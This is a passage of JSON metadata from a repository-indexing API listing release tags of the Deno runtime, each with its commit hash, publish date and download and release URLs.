ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.